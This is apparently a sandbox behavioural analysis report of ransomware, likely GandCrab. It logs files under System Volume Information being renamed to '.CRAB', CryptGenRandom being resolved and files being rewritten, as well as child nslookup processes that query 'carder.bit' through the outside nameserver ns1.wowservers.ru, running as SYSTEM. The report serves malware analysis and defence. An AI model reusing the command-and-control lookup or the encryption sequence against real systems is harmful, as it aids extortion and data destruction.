File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB, size = 272 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB, size = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 376 True 1
Fn
For performance reasons, the remaining 5404 entries are omitted.
The remaining entries can be found in glog.xml.
Process #10: nslookup.exe
10 18
»
Information Value
ID #10
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:01:25
OS Process Information
»
Information Value
PID 0xb44
Parent PID 0xad4 (c:\users\5p5nrg~1\appdata\local\temp\b32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x B48
0x B5C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x000f0000 0x000f4fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
nslookup.exe 0x00140000 0x0015dfff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000160000 0x00160000 0x001cffff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0027ffff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
private_0x0000000000370000 0x00370000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x0042ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x0059ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005a0000 0x005a0000 0x00727fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000730000 0x00730000 0x008b0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008c0000 0x008c0000 0x01cbffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d00000 0x01d00000 0x01d3ffff Private Memory Readable, Writable True False False -
private_0x0000000001db0000 0x01db0000 0x01deffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01df0000 0x020befff Memory Mapped File Readable False False False -
private_0x00000000020c0000 0x020c0000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000020c0000 0x020c0000 0x021bffff Private Memory Readable, Writable True False False -
private_0x00000000021c0000 0x021c0000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x022effff Private Memory Readable, Writable True False False -
wsock32.dll 0x70fa0000 0x70fa6fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74db0000 0x74de7fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74df0000 0x74df5fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74e00000 0x74e04fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74e10000 0x74e17fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74e20000 0x74e5bfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x74e60000 0x74e71fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x74e80000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74ed0000 0x74ed5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74ee0000 0x74eeffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xb48
10 18
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:20:56 (UTC) True 1
Fn
System Get Time type = Ticks, time = 119371 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x140000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = XDuwTfOno True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 94.249.60.127, 89.203.10.56, 189.75.183.21 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 570 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #11: nslookup.exe
10 18
»
Information Value
ID #11
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:37, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:47
OS Process Information
»
Information Value
PID 0x770
Parent PID 0xad4 (c:\users\5p5nrg~1\appdata\local\temp\b32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 690
0x 8C0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x00080000 0x00084fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True False False -
locale.nls 0x000f0000 0x00156fff Memory Mapped File Readable False False False -
private_0x0000000000160000 0x00160000 0x001cffff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x0033ffff Private Memory Readable, Writable True False False -
private_0x0000000000360000 0x00360000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x004dffff Private Memory Readable, Writable True False False -
nslookup.exe 0x004f0000 0x0050dfff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000640000 0x00640000 0x0073ffff Private Memory Readable, Writable True False False -
private_0x00000000008c0000 0x008c0000 0x008cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000008d0000 0x008d0000 0x00a57fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a60000 0x00a60000 0x00be0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000bf0000 0x00bf0000 0x01feffff Pagefile Backed Memory Readable True False False -
private_0x0000000001ff0000 0x01ff0000 0x0219ffff Private Memory Readable, Writable True False False -
private_0x0000000001ff0000 0x01ff0000 0x0217ffff Private Memory Readable, Writable True False False -
private_0x0000000002190000 0x02190000 0x0219ffff Private Memory Readable, Writable True False False -
private_0x00000000021a0000 0x021a0000 0x021dffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x021e0000 0x024aefff Memory Mapped File Readable False False False -
fwpuclnt.dll 0x74db0000 0x74de7fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74df0000 0x74df5fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74e00000 0x74e04fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74e10000 0x74e17fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74e20000 0x74e5bfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x74e60000 0x74e71fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x74e80000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74ed0000 0x74ed5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74ee0000 0x74eeffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
wsock32.dll 0x75860000 0x75866fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x690
10 18
»
Category Operation Information Success Count Logfile
